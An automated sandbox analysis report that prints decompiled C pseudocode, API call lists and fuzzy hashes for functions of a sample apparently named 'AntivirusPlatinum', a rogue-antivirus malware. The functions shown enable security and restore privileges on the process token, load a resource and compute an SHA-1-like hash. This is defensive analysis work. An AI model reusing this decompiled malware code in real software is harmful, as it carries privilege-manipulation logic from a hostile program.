                                                                                                                                                              			E004034AA() {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                              				int _t11;
                                                                                                                                                              				char _t31;
                                                                                                                                                              
                                                                                                                                                              				_t31 =  *0x41486e; // 0x0
                                                                                                                                                              				if(_t31 == 0) {
                                                                                                                                                              					 *0x41486e = 1;
                                                                                                                                                              					_t11 = OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
                                                                                                                                                              					if(_t11 != 0) {
                                                                                                                                                              						_v24.PrivilegeCount = 1;
                                                                                                                                                              						_v12 = 2;
                                                                                                                                                              						if(LookupPrivilegeValueA(0, "SeSecurityPrivilege",  &(_v24.Privileges)) != 0 && AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0) != 0 && GetLastError() == 0) {
                                                                                                                                                              							 *0x41486d = 1;
                                                                                                                                                              						}
                                                                                                                                                              						if(LookupPrivilegeValueA(0, "SeRestorePrivilege",  &(_v24.Privileges)) != 0) {
                                                                                                                                                              							AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                                                                                              						}
                                                                                                                                                              						return CloseHandle(_v8);
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				return _t11;
                                                                                                                                                              			}








                                                                                                                                                              0x004034b3
                                                                                                                                                              0x004034b9
                                                                                                                                                              0x004034c5
                                                                                                                                                              0x004034d3
                                                                                                                                                              0x004034db
                                                                                                                                                              0x004034ef
                                                                                                                                                              0x004034f6
                                                                                                                                                              0x00403507
                                                                                                                                                              0x00403524
                                                                                                                                                              0x00403524
                                                                                                                                                              0x00403539
                                                                                                                                                              0x00403546
                                                                                                                                                              0x00403546
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00403552
                                                                                                                                                              0x004034db
                                                                                                                                                              0x00403555

                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,?,00000000,004037BD,?,00000000,?,?), ref: 004034CC
                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 004034D3
                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32 ref: 004034FD
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403514
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040351A
                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeRestorePrivilege,?), ref: 00403535
                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 00403546
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040354B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Token$AdjustLookupPrivilegePrivilegesProcessValue$CloseCurrentErrorHandleLastOpen
                                                                                                                                                              • String ID: @Met$SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                                              • API String ID: 2567606174-2163228371
                                                                                                                                                              • Opcode ID: c949ee787aeeb01e211e777db34c6ab15c62baebe83aeb3191ba4c1195d95a36
                                                                                                                                                              • Instruction ID: 4d87bf4ab330366511297bf3b21dea1e654d34ca96b66c7a981cdcd40eee38cc
                                                                                                                                                              • Opcode Fuzzy Hash: c949ee787aeeb01e211e777db34c6ab15c62baebe83aeb3191ba4c1195d95a36
                                                                                                                                                              • Instruction Fuzzy Hash: 9F116DB1900219BEEB00EBA49D84EFF7BACEB44349F044076A601E21A1D7B59F04CB78
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 90%
                                                                                                                                                              			E004096AF(void* __ecx) {
                                                                                                                                                              				char _v1028;
                                                                                                                                                              				struct HINSTANCE__* _t5;
                                                                                                                                                              				struct HRSRC__* _t6;
                                                                                                                                                              				signed int _t10;
                                                                                                                                                              				char _t12;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              
                                                                                                                                                              				_t16 = __ecx;
                                                                                                                                                              				_t5 = GetModuleHandleA(0);
                                                                                                                                                              				_t17 = "RTL";
                                                                                                                                                              				_t6 = FindResourceA(_t5, "RTL", 5);
                                                                                                                                                              				if(_t6 == 0) {
                                                                                                                                                              					E00409553(_t16, "LTR",  &_v1028, 1, "LTR");
                                                                                                                                                              					_t10 = E0040A4E9( &_v1028, _t17);
                                                                                                                                                              					asm("sbb al, al");
                                                                                                                                                              					_t12 =  ~_t10 + 1;
                                                                                                                                                              					 *((char*)(_t16 + 0x10)) = _t12;
                                                                                                                                                              					return _t12;
                                                                                                                                                              				}
                                                                                                                                                              				 *((char*)(_t16 + 0x10)) = 1;
                                                                                                                                                              				return _t6;
                                                                                                                                                              			}









                                                                                                                                                              0x004096bc
                                                                                                                                                              0x004096be
                                                                                                                                                              0x004096c6
                                                                                                                                                              0x004096cd
                                                                                                                                                              0x004096d5
                                                                                                                                                              0x004096ef
                                                                                                                                                              0x004096fc
                                                                                                                                                              0x00409703
                                                                                                                                                              0x00409705
                                                                                                                                                              0x00409707
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409707
                                                                                                                                                              0x004096d7
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,00414C88), ref: 004096BE
                                                                                                                                                              • FindResourceA.KERNEL32(00000000,RTL,00000005), ref: 004096CD
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FindHandleModuleResource
                                                                                                                                                              • String ID: LTR$RTL
                                                                                                                                                              • API String ID: 3537982541-719208805
                                                                                                                                                              • Opcode ID: c85929189a2336619c142bfb5adf14b24fcf8cab46fe22709d53f16226de1815
                                                                                                                                                              • Instruction ID: 12f79db75577d25306824e15d06a1a3014e73688b613185c72924c9a3f94fbbd
                                                                                                                                                              • Opcode Fuzzy Hash: c85929189a2336619c142bfb5adf14b24fcf8cab46fe22709d53f16226de1815
                                                                                                                                                              • Instruction Fuzzy Hash: F9F0B4726002147ADA1066759C1AFE72A6CDB45704F04417AB309E61C2D7F89A55C7A9
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040E0E1(void* __ecx) {
                                                                                                                                                              				struct _FILETIME _v12;
                                                                                                                                                              				struct _SYSTEMTIME _v28;
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              
                                                                                                                                                              				_t14 = __ecx;
                                                                                                                                                              				GetSystemTime( &_v28);
                                                                                                                                                              				SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                                                                              				return E0040DF79(_t11, _t14,  &_v12);
                                                                                                                                                              			}







                                                                                                                                                              0x0040e0ec
                                                                                                                                                              0x0040e0ee
                                                                                                                                                              0x0040e0fc
                                                                                                                                                              0x0040e10f

                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemTime.KERNEL32(?), ref: 0040E0EE
                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E0FC
                                                                                                                                                                • Part of subcall function 0040DF79: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040DF8A
                                                                                                                                                                • Part of subcall function 0040DF79: FileTimeToSystemTime.KERNEL32(?,?), ref: 0040DF98
                                                                                                                                                                • Part of subcall function 0040DF79: SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E00D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Time$File$System$Local
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2859370177-0
                                                                                                                                                              • Opcode ID: 0fbcf173760a5192ea96601a717504cfae41435c603bcbb0cce835998907240a
                                                                                                                                                              • Instruction ID: b976fda33143c74ac370e146003494d8e758708e9995241362427bb7c2108887
                                                                                                                                                              • Opcode Fuzzy Hash: 0fbcf173760a5192ea96601a717504cfae41435c603bcbb0cce835998907240a
                                                                                                                                                              • Instruction Fuzzy Hash: 21D012B290011E7BCF00E7F4DD46CCE7BBCEA44204F000062AA02F3041EA74E6458BE5
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                              			E0040D4FF(void* __ecx, void* _a4, signed int* _a8, signed int _a12) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                              				signed int* _v20;
                                                                                                                                                              				void _v40;
                                                                                                                                                              				signed int* _t235;
                                                                                                                                                              				signed int _t243;
                                                                                                                                                              				signed int _t254;
                                                                                                                                                              				signed int _t263;
                                                                                                                                                              				signed int _t273;
                                                                                                                                                              				void* _t275;
                                                                                                                                                              				signed int _t285;
                                                                                                                                                              				signed int _t287;
                                                                                                                                                              				signed int _t291;
                                                                                                                                                              				signed int _t297;
                                                                                                                                                              				signed int* _t311;
                                                                                                                                                              				void* _t331;
                                                                                                                                                              				intOrPtr _t332;
                                                                                                                                                              				signed int _t336;
                                                                                                                                                              				signed int* _t339;
                                                                                                                                                              				signed int* _t340;
                                                                                                                                                              				signed int* _t344;
                                                                                                                                                              				signed int _t345;
                                                                                                                                                              				signed int* _t349;
                                                                                                                                                              				void* _t350;
                                                                                                                                                              				signed int _t387;
                                                                                                                                                              				signed int* _t389;
                                                                                                                                                              				signed int* _t397;
                                                                                                                                                              				signed int* _t405;
                                                                                                                                                              				signed int* _t409;
                                                                                                                                                              				signed int* _t412;
                                                                                                                                                              				signed int* _t417;
                                                                                                                                                              				void* _t418;
                                                                                                                                                              
                                                                                                                                                              				if(_a12 == 0) {
                                                                                                                                                              					_t285 = _a8;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t285 = 0x41f970;
                                                                                                                                                              					E0040A2B6(__ecx, 0x41f970, _a8, 0x40);
                                                                                                                                                              				}
                                                                                                                                                              				if( *0x41f968 == 0) {
                                                                                                                                                              					_t332 = 0;
                                                                                                                                                              					_t417 = 0x41f32c;
                                                                                                                                                              					do {
                                                                                                                                                              						_t4 = _t332 + 1; // 0x1
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						_t387 = 5;
                                                                                                                                                              						_t9 = _t332 + 2; // 0x2
                                                                                                                                                              						 *((intOrPtr*)(_t417 - 4)) = _t332;
                                                                                                                                                              						 *_t417 = _t4 % _t387;
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						_t15 = _t332 + 3; // 0x3
                                                                                                                                                              						_t417 =  &(_t417[5]);
                                                                                                                                                              						 *(_t417 - 0x10) = _t9 % _t387;
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						_t21 = _t332 + 4; // 0x4
                                                                                                                                                              						 *(_t417 - 0xc) = _t15 % _t387;
                                                                                                                                                              						asm("cdq");
                                                                                                                                                              						 *(_t417 - 8) = _t21 % _t387;
                                                                                                                                                              						if(_t332 == 0) {
                                                                                                                                                              							_t332 = 4;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t332 = _t332 - 1;
                                                                                                                                                              						}
                                                                                                                                                              					} while (_t417 < 0x41f96c);
                                                                                                                                                              					 *0x41f968 = 1;
                                                                                                                                                              				}
                                                                                                                                                              				_t287 = 5;
                                                                                                                                                              				memcpy( &_v40, _a4, _t287 << 2);
                                                                                                                                                              				_t235 = 0x41f334;
                                                                                                                                                              				_a12 = _t285;
                                                                                                                                                              				do {
                                                                                                                                                              					_t389 = _a12;
                                                                                                                                                              					asm("ror ecx, 0x8");
                                                                                                                                                              					asm("rol edx, 0x8");
                                                                                                                                                              					_t291 =  *_t389 & 0xff00ff00 |  *_t389 & 0x00ff00ff;
                                                                                                                                                              					 *_t389 = _t291;
                                                                                                                                                              					_t33 = _t235 - 8; // 0x0
                                                                                                                                                              					_t336 =  *(_t418 +  *_t235 * 4 - 0x24);
                                                                                                                                                              					_t37 = _t235 - 4; // 0x0
                                                                                                                                                              					_a12 = _a12 + 4;
                                                                                                                                                              					_a8 = _t418 +  *_t33 * 4 - 0x24;
                                                                                                                                                              					_t47 =  &(_t235[1]); // 0x0
                                                                                                                                                              					_v12 = _t418 +  *_t47 * 4 - 0x24;
                                                                                                                                                              					_t52 = _t235 - 0xc; // 0x0
                                                                                                                                                              					_v8 = _t336;
                                                                                                                                                              					asm("rol esi, 0x5");
                                                                                                                                                              					 *_v12 =  *_v12 + (( *(_t418 +  *_t37 * 4 - 0x24) ^ _t336) &  *_a8 ^ _v8) +  *((intOrPtr*)(_t418 +  *_t52 * 4 - 0x24)) + _t291 + 0x5a827999;
                                                                                                                                                              					asm("ror dword [ecx], 0x2");
                                                                                                                                                              					_t235 =  &(_t235[5]);
                                                                                                                                                              					_t339 = 0x41f474;
                                                                                                                                                              				} while (_t235 < 0x41f474);
                                                                                                                                                              				_a12 = 0x10;
                                                                                                                                                              				do {
                                                                                                                                                              					_t65 = _a12 - 3; // 0xd
                                                                                                                                                              					_t294 = _t65;
                                                                                                                                                              					_t397 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                              					_t68 = _t294 - 5; // 0x8
                                                                                                                                                              					_t71 = _t294 + 5; // 0x12
                                                                                                                                                              					_t243 =  *(_t285 + (_t68 & 0x0000000f) * 4) ^  *(_t285 + (_t71 & 0x0000000f) * 4) ^  *(_t285 + (_t65 & 0x0000000f) * 4) ^  *_t397;
                                                                                                                                                              					asm("rol eax, 1");
                                                                                                                                                              					 *_t397 = _t243;
                                                                                                                                                              					_t76 = _t339 - 8; // 0x0
                                                                                                                                                              					_t297 =  *(_t418 +  *_t339 * 4 - 0x24);
                                                                                                                                                              					_t80 = _t339 - 4; // 0x0
                                                                                                                                                              					_a8 = _t418 +  *_t76 * 4 - 0x24;
                                                                                                                                                              					_t88 =  &(_t339[1]); // 0x0
                                                                                                                                                              					_v8 = _t418 +  *_t88 * 4 - 0x24;
                                                                                                                                                              					_t93 = _t339 - 0xc; // 0x0
                                                                                                                                                              					_v12 = _t297;
                                                                                                                                                              					asm("rol esi, 0x5");
                                                                                                                                                              					 *_v8 =  *_v8 + (( *(_t418 +  *_t80 * 4 - 0x24) ^ _t297) &  *_a8 ^ _v12) +  *((intOrPtr*)(_t418 +  *_t93 * 4 - 0x24)) + _t243 + 0x5a827999;
                                                                                                                                                              					asm("ror dword [eax], 0x2");
                                                                                                                                                              					_a12 = _a12 + 1;
                                                                                                                                                              					_t339 =  &(_t339[5]);
                                                                                                                                                              				} while (_t339 < 0x41f4c4);
                                                                                                                                                              				_a12 = 0x14;
                                                                                                                                                              				_t340 = 0x41f4c4;
                                                                                                                                                              				do {
                                                                                                                                                              					_t108 = _a12 - 3; // 0x11
                                                                                                                                                              					_t300 = _t108;
                                                                                                                                                              					_t405 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                              					_t111 = _t300 - 5; // 0xc
                                                                                                                                                              					_t112 = _t300 + 5; // 0x16
                                                                                                                                                              					_t254 =  *(_t285 + (_t111 & 0x0000000f) * 4) ^  *(_t285 + (_t112 & 0x0000000f) * 4) ^  *(_t285 + (_t108 & 0x0000000f) * 4) ^  *_t405;
                                                                                                                                                              					asm("rol eax, 1");
                                                                                                                                                              					 *_t405 = _t254;
                                                                                                                                                              					_t119 = _t340 - 8; // 0x0
                                                                                                                                                              					_a8 = _t418 +  *_t119 * 4 - 0x24;
                                                                                                                                                              					_t124 =  &(_t340[1]); // 0x0
                                                                                                                                                              					_v8 = _t418 +  *_t124 * 4 - 0x24;
                                                                                                                                                              					_t129 = _t340 - 0xc; // 0x0
                                                                                                                                                              					_t133 = _t340 - 4; // 0x0
                                                                                                                                                              					asm("rol esi, 0x5");
                                                                                                                                                              					_t143 =  *((intOrPtr*)(_t418 +  *_t129 * 4 - 0x24)) + _t254 + 0x6ed9eba1; // 0x6fd9eba1
                                                                                                                                                              					 *_v8 =  *_v8 + ( *(_t418 +  *_t133 * 4 - 0x24) ^  *(_t418 +  *_t340 * 4 - 0x24) ^  *_a8) + _t143;
                                                                                                                                                              					asm("ror dword [ecx], 0x2");
                                                                                                                                                              					_a12 = _a12 + 1;
                                                                                                                                                              					_t340 =  &(_t340[5]);
                                                                                                                                                              				} while (_t340 < 0x41f654);
                                                                                                                                                              				_t311 = 0x41f650;
                                                                                                                                                              				_a12 = 0x28;
                                                                                                                                                              				_a8 = 0x41f650;
                                                                                                                                                              				do {
                                                                                                                                                              					_t149 = _a12 - 3; // 0x25
                                                                                                                                                              					_t341 = _t149;
                                                                                                                                                              					_t409 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                              					_t152 = _t341 - 5; // 0x20
                                                                                                                                                              					_t155 = _t341 + 5; // 0x2a
                                                                                                                                                              					_t263 =  *(_t285 + (_t152 & 0x0000000f) * 4) ^  *(_t285 + (_t155 & 0x0000000f) * 4) ^  *(_t285 + (_t149 & 0x0000000f) * 4) ^  *_t409;
                                                                                                                                                              					asm("rol eax, 1");
                                                                                                                                                              					 *_t409 = _t263;
                                                                                                                                                              					_t160 = _t311 - 4; // 0x0
                                                                                                                                                              					_t161 =  &(_t311[2]); // 0x0
                                                                                                                                                              					_t344 = _t418 +  *_t160 * 4 - 0x24;
                                                                                                                                                              					_v20 = _t344;
                                                                                                                                                              					_t345 =  *_t344;
                                                                                                                                                              					_v16 = _t418 +  *_t161 * 4 - 0x24;
                                                                                                                                                              					_t173 = _t311 - 8; // 0x0
                                                                                                                                                              					_t174 =  &(_t311[1]); // 0x0
                                                                                                                                                              					_v12 = _t345;
                                                                                                                                                              					asm("rol edi, 0x5");
                                                                                                                                                              					_t185 =  *((intOrPtr*)(_t418 +  *_t173 * 4 - 0x24)) + _t263 - 0x70e44324; // -1877230372
                                                                                                                                                              					 *_v16 =  *_v16 + ( *(_t418 +  *_t174 * 4 - 0x24) & (_t345 |  *(_t418 +  *_t311 * 4 - 0x24)) | _v12 &  *(_t418 +  *_t311 * 4 - 0x24)) + _t185;
                                                                                                                                                              					asm("ror dword [eax], 0x2");
                                                                                                                                                              					_a12 = _a12 + 1;
                                                                                                                                                              					_t311 =  &(_a8[5]);
                                                                                                                                                              					_a8 = _t311;
                                                                                                                                                              				} while (_t311 < 0x41f7e0);
                                                                                                                                                              				_a12 = 0x3c;
                                                                                                                                                              				_t349 = 0x41f7e4;
                                                                                                                                                              				do {
                                                                                                                                                              					_t193 = _a12 - 3; // 0x39
                                                                                                                                                              					_t319 = _t193;
                                                                                                                                                              					_t412 = _t285 + (_a12 & 0x0000000f) * 4;
                                                                                                                                                              					_t196 = _t319 - 5; // 0x34
                                                                                                                                                              					_t197 = _t319 + 5; // 0x3e
                                                                                                                                                              					_t273 =  *(_t285 + (_t196 & 0x0000000f) * 4) ^  *(_t285 + (_t197 & 0x0000000f) * 4) ^  *(_t285 + (_t193 & 0x0000000f) * 4) ^  *_t412;
                                                                                                                                                              					asm("rol eax, 1");
                                                                                                                                                              					 *_t412 = _t273;
                                                                                                                                                              					_t204 = _t349 - 8; // 0x0
                                                                                                                                                              					_a8 = _t418 +  *_t204 * 4 - 0x24;
                                                                                                                                                              					_t209 =  &(_t349[1]); // 0x0
                                                                                                                                                              					_v16 = _t418 +  *_t209 * 4 - 0x24;
                                                                                                                                                              					_t214 = _t349 - 0xc; // 0x0
                                                                                                                                                              					_t218 = _t349 - 4; // 0x0
                                                                                                                                                              					asm("rol esi, 0x5");
                                                                                                                                                              					_t228 =  *((intOrPtr*)(_t418 +  *_t214 * 4 - 0x24)) + _t273 - 0x359d3e2a; // -882720298
                                                                                                                                                              					 *_v16 =  *_v16 + ( *(_t418 +  *_t218 * 4 - 0x24) ^  *(_t418 +  *_t349 * 4 - 0x24) ^  *_a8) + _t228;
                                                                                                                                                              					asm("ror dword [ecx], 0x2");
                                                                                                                                                              					_a12 = _a12 + 1;
                                                                                                                                                              					_t349 =  &(_t349[5]);
                                                                                                                                                              				} while (_t349 < 0x41f974);
                                                                                                                                                              				_t275 = _a4;
                                                                                                                                                              				_t331 =  &_v40 - _t275;
                                                                                                                                                              				_t350 = 5;
                                                                                                                                                              				do {
                                                                                                                                                              					 *_t275 =  *_t275 +  *((intOrPtr*)(_t331 + _t275));
                                                                                                                                                              					_t275 = _t275 + 4;
                                                                                                                                                              					_t350 = _t350 - 1;
                                                                                                                                                              				} while (_t350 != 0);
                                                                                                                                                              				return _t275;
                                                                                                                                                              			}




































                                                                                                                                                              0x0040d50c
                                                                                                                                                              0x0040d520
                                                                                                                                                              0x0040d50e
                                                                                                                                                              0x0040d513
                                                                                                                                                              0x0040d519
                                                                                                                                                              0x0040d519
                                                                                                                                                              0x0040d52a
                                                                                                                                                              0x0040d52c
                                                                                                                                                              0x0040d52e
                                                                                                                                                              0x0040d533
                                                                                                                                                              0x0040d533
                                                                                                                                                              0x0040d536
                                                                                                                                                              0x0040d539
                                                                                                                                                              0x0040d53c
                                                                                                                                                              0x0040d53f
                                                                                                                                                              0x0040d542
                                                                                                                                                              0x0040d544
                                                                                                                                                              0x0040d547
                                                                                                                                                              0x0040d54a
                                                                                                                                                              0x0040d54d
                                                                                                                                                              0x0040d550
                                                                                                                                                              0x0040d553
                                                                                                                                                              0x0040d556
                                                                                                                                                              0x0040d559
                                                                                                                                                              0x0040d55c
                                                                                                                                                              0x0040d561
                                                                                                                                                              0x0040d568
                                                                                                                                                              0x0040d563
                                                                                                                                                              0x0040d563
                                                                                                                                                              0x0040d563
                                                                                                                                                              0x0040d569
                                                                                                                                                              0x0040d571
                                                                                                                                                              0x0040d571
                                                                                                                                                              0x0040d57d
                                                                                                                                                              0x0040d581
                                                                                                                                                              0x0040d583
                                                                                                                                                              0x0040d588
                                                                                                                                                              0x0040d58b
                                                                                                                                                              0x0040d58b
                                                                                                                                                              0x0040d592
                                                                                                                                                              0x0040d59b
                                                                                                                                                              0x0040d5a4
                                                                                                                                                              0x0040d5a6
                                                                                                                                                              0x0040d5a8
                                                                                                                                                              0x0040d5ad
                                                                                                                                                              0x0040d5b1
                                                                                                                                                              0x0040d5b8
                                                                                                                                                              0x0040d5c0
                                                                                                                                                              0x0040d5c3
                                                                                                                                                              0x0040d5cc
                                                                                                                                                              0x0040d5cf
                                                                                                                                                              0x0040d5d6
                                                                                                                                                              0x0040d5de
                                                                                                                                                              0x0040d5f0
                                                                                                                                                              0x0040d5f5
                                                                                                                                                              0x0040d5f8
                                                                                                                                                              0x0040d5fb
                                                                                                                                                              0x0040d600
                                                                                                                                                              0x0040d604
                                                                                                                                                              0x0040d60b
                                                                                                                                                              0x0040d60e
                                                                                                                                                              0x0040d60e
                                                                                                                                                              0x0040d614
                                                                                                                                                              0x0040d617
                                                                                                                                                              0x0040d620
                                                                                                                                                              0x0040d62f
                                                                                                                                                              0x0040d631
                                                                                                                                                              0x0040d633
                                                                                                                                                              0x0040d635
                                                                                                                                                              0x0040d63a
                                                                                                                                                              0x0040d63e
                                                                                                                                                              0x0040d649
                                                                                                                                                              0x0040d64c
                                                                                                                                                              0x0040d655
                                                                                                                                                              0x0040d658
                                                                                                                                                              0x0040d65f
                                                                                                                                                              0x0040d667
                                                                                                                                                              0x0040d679
                                                                                                                                                              0x0040d67e
                                                                                                                                                              0x0040d681
                                                                                                                                                              0x0040d684
                                                                                                                                                              0x0040d68c
                                                                                                                                                              0x0040d694
                                                                                                                                                              0x0040d69b
                                                                                                                                                              0x0040d69d
                                                                                                                                                              0x0040d6a0
                                                                                                                                                              0x0040d6a0
                                                                                                                                                              0x0040d6a6
                                                                                                                                                              0x0040d6a9
                                                                                                                                                              0x0040d6ac
                                                                                                                                                              0x0040d6c1
                                                                                                                                                              0x0040d6c3
                                                                                                                                                              0x0040d6c5
                                                                                                                                                              0x0040d6c7
                                                                                                                                                              0x0040d6d0
                                                                                                                                                              0x0040d6d3
                                                                                                                                                              0x0040d6da
                                                                                                                                                              0x0040d6dd
                                                                                                                                                              0x0040d6e4
                                                                                                                                                              0x0040d6ef
                                                                                                                                                              0x0040d6fe
                                                                                                                                                              0x0040d705
                                                                                                                                                              0x0040d707
                                                                                                                                                              0x0040d70a
                                                                                                                                                              0x0040d70d
                                                                                                                                                              0x0040d710
                                                                                                                                                              0x0040d718
                                                                                                                                                              0x0040d71d
                                                                                                                                                              0x0040d724
                                                                                                                                                              0x0040d727
                                                                                                                                                              0x0040d72a
                                                                                                                                                              0x0040d72a
                                                                                                                                                              0x0040d730
                                                                                                                                                              0x0040d733
                                                                                                                                                              0x0040d73c
                                                                                                                                                              0x0040d74b
                                                                                                                                                              0x0040d74d
                                                                                                                                                              0x0040d74f
                                                                                                                                                              0x0040d751
                                                                                                                                                              0x0040d754
                                                                                                                                                              0x0040d75d
                                                                                                                                                              0x0040d765
                                                                                                                                                              0x0040d768
                                                                                                                                                              0x0040d76a
                                                                                                                                                              0x0040d76d
                                                                                                                                                              0x0040d770
                                                                                                                                                              0x0040d77b
                                                                                                                                                              0x0040d78b
                                                                                                                                                              0x0040d793
                                                                                                                                                              0x0040d79a
                                                                                                                                                              0x0040d7a2
                                                                                                                                                              0x0040d7a5
                                                                                                                                                              0x0040d7a8
                                                                                                                                                              0x0040d7b1
                                                                                                                                                              0x0040d7b1
                                                                                                                                                              0x0040d7ba
                                                                                                                                                              0x0040d7c1
                                                                                                                                                              0x0040d7c6
                                                                                                                                                              0x0040d7c9
                                                                                                                                                              0x0040d7c9
                                                                                                                                                              0x0040d7cf
                                                                                                                                                              0x0040d7d2
                                                                                                                                                              0x0040d7d5
                                                                                                                                                              0x0040d7ea
                                                                                                                                                              0x0040d7ec
                                                                                                                                                              0x0040d7ee
                                                                                                                                                              0x0040d7f0
                                                                                                                                                              0x0040d7f9
                                                                                                                                                              0x0040d7fc
                                                                                                                                                              0x0040d803
                                                                                                                                                              0x0040d806
                                                                                                                                                              0x0040d80d
                                                                                                                                                              0x0040d818
                                                                                                                                                              0x0040d827
                                                                                                                                                              0x0040d82e
                                                                                                                                                              0x0040d830
                                                                                                                                                              0x0040d833
                                                                                                                                                              0x0040d836
                                                                                                                                                              0x0040d839
                                                                                                                                                              0x0040d841
                                                                                                                                                              0x0040d849
                                                                                                                                                              0x0040d84b
                                                                                                                                                              0x0040d84c
                                                                                                                                                              0x0040d84f
                                                                                                                                                              0x0040d851
                                                                                                                                                              0x0040d854
                                                                                                                                                              0x0040d854
                                                                                                                                                              0x0040d85b

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
